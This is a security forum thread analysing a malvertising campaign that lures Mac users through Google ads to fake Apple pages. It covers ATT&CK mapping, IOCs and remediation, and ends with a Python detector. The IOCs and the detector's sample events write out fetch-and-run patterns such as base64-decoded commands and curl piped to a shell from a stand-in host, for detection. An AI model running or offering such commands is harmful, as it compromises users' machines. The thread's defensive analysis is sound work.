Fake “Mac Cleaner” Campaign Uses Google Ads to Redirect Users to Malware

Brownie2019

Mar 9, 2019
Cybercriminals are exploiting Google Search Ads to distribute malware through deceptive landing pages that impersonate Apple’s official website design.
The malicious ads appear prominently in Google Search results when users search for “mac cleaner,” displaying trusted domains such as docs.google.com and business.google.com as landing pages.
However, clicking these ads redirects users to Google Apps Script macros pages disguised with Apple’s official branding, complete with replica navigation menus and interface elements.
Security researchers have identified a sophisticated campaign targeting macOS users who are searching for disk cleanup utilities, with ads redirecting victims to malicious Google Apps Script pages that host remote code execution payloads.
The pages contain deceptive instructions promising to help users check storage or free up disk space on their machines, common maintenance tasks that lull users into a false sense of security.
Full Story:
 
This is a good example of “malvertising” (malicious sponsored ads) combined with “living off trusted infrastructure” (using Google-owned domains like docs.google.com / business.google.com / script.google.com to look legitimate).

What the campaign is doing (high level)
  • Sponsored Google Search results for terms like “mac cleaner” can appear to point to trusted Google domains, then redirect to a Google Apps Script page that visually imitates Apple Support pages. ([mackeeper.com](https://mackeeper.com/blog/suspicious-ads-on-google-which-contain-harmful-content-for-mac-users/))
  • The fake “Apple-like” page tries to socially engineer the user into opening Terminal and pasting commands that decode/download and execute a remote script (e.g., Base64 + curl | shell style behavior). That’s effectively “run attacker code on your Mac as you.” ([mackeeper.com](https://mackeeper.com/blog/suspicious-ads-on-google-which-contain-harmful-content-for-mac-users/))

Why it works so well
  • The ad can show a “clean” looking display URL, and the first hop may be a legitimate Google domain, lowering suspicion. ([mackeeper.com](https://mackeeper.com/blog/suspicious-ads-on-google-which-contain-harmful-content-for-mac-users/))
  • The page looks like Apple, and the instructions are framed as normal maintenance (“clean storage”, “install packages”), which reduces user caution. ([mackeeper.com](https://mackeeper.com/blog/suspicious-ads-on-google-which-contain-harmful-content-for-mac-users/))
  • Obfuscation (Base64, scrambled command segments) makes it harder for users (and sometimes security tools) to quickly recognize what’s happening. ([mackeeper.com](https://mackeeper.com/blog/suspicious-ads-on-google-which-contain-harmful-content-for-mac-users/))

Practical safety guidance for members
  • Treat sponsored results as “untrusted” by default, especially for software/utilities.
  • Never copy/paste Terminal commands from a web page you reached via an ad (or any page you didn’t deliberately navigate to and verify).
  • If something claims to be Apple Support, verify you are actually on an Apple domain (AppleInsider notes real Apple Support pages should be on support.apple.com, not script.google.com). ([appleinsider.com](https://appleinsider.com/articles/26/01/28/mac-malware-is-sneaking-into-some-sponsored-google-ads))
  • Use macOS built-in storage management and only obtain utilities from reputable vendors / official channels (e.g., Mac App Store) rather than “random cleaner” searches.

If someone already clicked the ad and followed instructions
If a user actually pasted/executed the Terminal command(s), assume compromise is possible until proven otherwise.

Recommended next steps (low-risk first):
  • Disconnect from the network (to stop any ongoing remote activity).
  • Run a full scan with a reputable macOS security product and remove anything it detects (false positives are possible, but don’t ignore detections without validation).
  • Check for persistence items (new Login Items, LaunchAgents/LaunchDaemons, suspicious Profiles/MDM, unknown browser extensions).
  • Change passwords (starting with email + Apple ID + financial accounts) from a known-clean device, especially if the Mac was used for password managers or SSH keys.
  • If this happened to you, it’s best to open a help topic in the Malware Removal / macOS help area and include exactly what was run and what was downloaded (do not re-run the commands).

Funny how malware doesn’t hide in shady corners anymore, but shows up wearing a suit in Google ads. The trick isn’t even technical—it’s trust. People see a familiar domain, a page that looks like Apple, and that’s enough to lower their guard.
What’s unsettling is that they don’t need to break into your system; they just need you to run the command yourself. It’s not the hacker sneaking in through the window—it’s you opening the front door.
Maybe that’s the real takeaway: the danger isn’t in the strange or exotic, it’s in the everyday. And that’s scarier than any virus with a fancy name. 🌐💡
 
MITRE ATT&CK Mapping

  • T1583.001 (Acquire Infrastructure): Abuse of legitimate, compromised Google Ads accounts.
  • T1566.002 (Phishing: Spearphishing Link): Malicious ads appearing as top search results.
  • T1059.004 (Command and Scripting Interpreter: Unix Shell): Execution of obscure shell commands.
  • T1027 (Obfuscated Files or Information): Use of base64 encoding to hide the payload.

The Kill Chain

  • Initial Access: User searches for macOS maintenance tools. A "Sponsored" Google Ad appears, seemingly from a trusted entity.
  • Redirection: Clicking the ad redirects the user to a Google Apps Script macro page. This domain (script[.]google[.]com) is trusted by default in many security appliances, evading reputation-based filtering.
  • Social Engineering: The landing page simulates an Apple system check. It displays a fake progress bar and instructs the user to "Run this command to clean storage."
  • Execution: The user copies and pastes a terminal command.

Live Evidence & Anchors (IOCs)
The following string literals were extracted directly from the campaign analysis and can be used for detection.

Social Engineering Strings
  • "Cleaning macOS Storage..."
  • "Installing packages please wait..."

Compromised Ad Identities (identities used to serve ads)
  • "Nathaniel Josue Rodriguez"
  • "Aloha Shirt Shop"

Payload Construction (Pattern)
  • echo '...' | base64 -D | /bin/bash (decodes and pipes directly to shell)
  • curl [-]fsSL (silent fetch of stage-two payload)

Remediation - THE ENTERPRISE TRACK (SANS PICERL)

Phase 1: Identification & Containment
  • Query SIEM: Search for process execution events where Terminal.app spawns bash or zsh with base64 -D or base64 -d arguments.
  • Network Block: Temporarily block or scrutinize traffic to script[.]google[.]com if not business-critical, or inspect referrer headers for Google Ad click IDs (gclid).
  • Identity Check: Review logs for the compromised ad account names ("Nathaniel Josue Rodriguez") if ad data is ingested.

Phase 2: Eradication
  • Kill Chain Break: Terminate any active curl or python processes spawned from the terminal commands identified above.
  • Persistence Removal: Check LaunchAgents and LaunchDaemons (~/Library/LaunchAgents/) for recently created plists referencing the downloaded script.

Phase 3: Recovery
  • Credential Rotation: If the script was executed, assume all browser-stored passwords and SSH keys are compromised. Reset immediately.
  • Reimaging: Due to the potential for root-level persistence, reimaging the affected macOS device is the only guaranteed removal method.

Phase 4: Lessons Learned
  • Policy: Implement "Block" policies for Uncategorized and Newly Registered Domains (NRDs).
  • Training: Specifically train macOS users that no legitimate software requires pasting obscure code into the Terminal for installation.

Remediation - THE HOME USER TRACK

Priority 1: Safety (Stop & Disconnect)
  • If you ran the command, disconnect from the internet immediately. The malware needs a connection to send your data to the attacker.
  • Do not type your password into any pop-up boxes that appear shortly after running the command.

Priority 2: Cleanup
  • Check for Malware: Download a reputable tool like Malwarebytes for Mac (on a different, clean device, then transfer via USB) to scan your system.
  • Browser Cleanup: Go to Safari/Chrome settings and clear all website data/cache to remove the malicious ad tracking.

Priority 3: Identity Hygiene
  • Change your passwords for Email, Banking, and Crypto exchanges from a different device (like your phone).
  • Enable 2-Factor Authentication (2FA) on all accounts if you haven't already.

Hardening & References

  • Baseline: Enable macOS Gatekeeper and set it to "App Store and identified developers."
  • Prevention: Install a browser-based ad blocker (e.g., uBlock Origin) to prevent malicious ads from loading in search results.
  • Reference: [NIST SP 800-83 Rev. 1] Guide to Malware Incident Prevention and Handling.

Sources

GBHackers Security News

MacKeeper Security Blog

AppleInsider
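The Phase 1 SIEM query from the post above, worked as Python detection logic over constructed process-execution events; this is an added example, not code from the thread or any product. The event fields (pid, parent_name, process_name, command_line) are an assumed, EDR-agnostic JSON-lines shape that you would map onto your own telemetry.

```python
"""Detects the `base64 -D | /bin/bash` and `curl -fsSL ... | sh` patterns from the thread.
Added example, not the thread's code; the JSON-lines event shape is constructed."""
import json
import os
import shlex

SHELLS = {"bash", "zsh", "sh"}
DECODE_FLAGS = {"-D", "-d", "--decode"}  # macOS base64 uses -D, GNU coreutils -d/--decode
SAMPLE_EVENTS = [  # constructed sample telemetry, not real data
    {"pid": 4101, "parent_name": "Terminal.app", "process_name": "bash",
     "command_line": "echo 'UExBQ0VIT0xERVI=' | base64 -D | /bin/bash"},
    {"pid": 4102, "parent_name": "Terminal.app", "process_name": "zsh",
     "command_line": "curl -fsSL https://example.invalid/stage2.sh | sh"},
    {"pid": 4103, "parent_name": "Terminal.app", "process_name": "zsh",
     "command_line": "base64 -D -i photo.b64 -o photo.jpg"},  # benign decode, nothing executes it
    {"pid": 4104, "parent_name": "launchd", "process_name": "bash",
     "command_line": "echo aGk= | base64 -D | bash"},  # outside the Terminal-spawned scope
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

def pipeline_stages(command_line):
    """Split a command line into pipeline stages, honouring shell quoting."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars="|")
    lexer.whitespace_split, lexer.commenters = True, ""  # keep URLs containing '#' intact
    stages = [[]]
    for token in lexer:
        if token == "|":
            stages.append([])
        else:
            stages[-1].append(token)
    return [s for s in stages if s]

def classify(event):
    """Return the reasons an event matches; an empty list means no match."""
    if event.get("parent_name") != "Terminal.app" or event.get("process_name") not in SHELLS:
        return []  # the thread's SIEM query scopes on shells spawned by Terminal.app
    stages, reasons = pipeline_stages(event.get("command_line", "")), []
    for i, stage in enumerate(stages):
        if not any(os.path.basename(s[0]) in SHELLS for s in stages[i + 1:]):
            continue  # nothing downstream executes this stage's output
        if stage[0] == "base64" and DECODE_FLAGS & set(stage[1:]):
            reasons.append("base64 decode piped to shell")
        if stage[0] == "curl" and any("s" in t and t[:2] != "--" for t in stage[1:] if t[:1] == "-"):
            reasons.append("silent curl piped to shell")
    return reasons

def scan_jsonl(text):
    """Return [(pid, reasons)] for every matching event in a JSON-lines log."""
    events = [json.loads(line) for line in text.splitlines() if line.strip()]
    return [(e["pid"], classify(e)) for e in events if classify(e)]
```

Drop the parent_name condition in classify to widen the hunt beyond Terminal-spawned shells, at the cost of more benign decode hits from scripts and build tooling.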